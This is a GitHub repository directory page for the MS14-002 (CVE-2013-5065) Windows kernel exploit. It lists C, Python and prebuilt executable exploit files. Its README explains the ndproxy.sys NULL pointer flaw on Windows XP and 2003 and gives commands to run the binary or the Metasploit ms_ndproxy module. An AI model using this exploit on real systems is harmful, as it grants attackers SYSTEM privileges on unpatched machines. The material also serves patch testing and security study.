MS14-002

May 12, 2017

72fb126 · May 12, 2017

This branch is 117 commits behind SecWiki/windows-kernel-exploits:master.

Name	Name	Last commit message	Last commit date
parent directory ..
CVE-2013-5065.c	CVE-2013-5065.c	MS14-002	Apr 22, 2017
CVE-2013-5065.exe	CVE-2013-5065.exe	MS14-002	May 12, 2017
CVE-2013-5065.py	CVE-2013-5065.py	MS14-002	Apr 22, 2017
MS14-002.exe	MS14-002.exe	MS14-002	Apr 22, 2017
README.md	README.md	Update README.md	Apr 27, 2017
win2003.png	win2003.png	MS14-002	Apr 22, 2017

README.md

MS14-002

This module exploits a flaw in the ndproxy.
sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. 
The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, 
where user provided input is used to access an array unsafely, and the value is used to perform a call, 
leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. 
This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2.
In order to work the service "Routing and Remote Access" must be running on the target system.

The exp was from @ev-zzo @Tomislav Paskalev @ryujin

Vulnerability reference:

Usage

c:> MS14-002.exe XP
c:> MS14-002.exe 2k3

load the module within the msf

msf

  msf > use exploit/windows/local/ms_ndproxy
  msf exploit(ms_ndproxy) > show targets
        ...targets...
  msf exploit(ms_ndproxy) > set TARGET <target-id>
  msf exploit(ms_ndproxy) > show options
        ...show and set options...
  msf exploit(ms_ndproxy) > exploit

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Files

MS14-002

MS14-002

README.md

MS14-002

Usage

load the module within the msf

Links

Files

MS14-002

Directory actions

More options

Directory actions

More options

Latest commit

History

MS14-002

Folders and files

parent directory

README.md

MS14-002

Usage

load the module within the msf

Links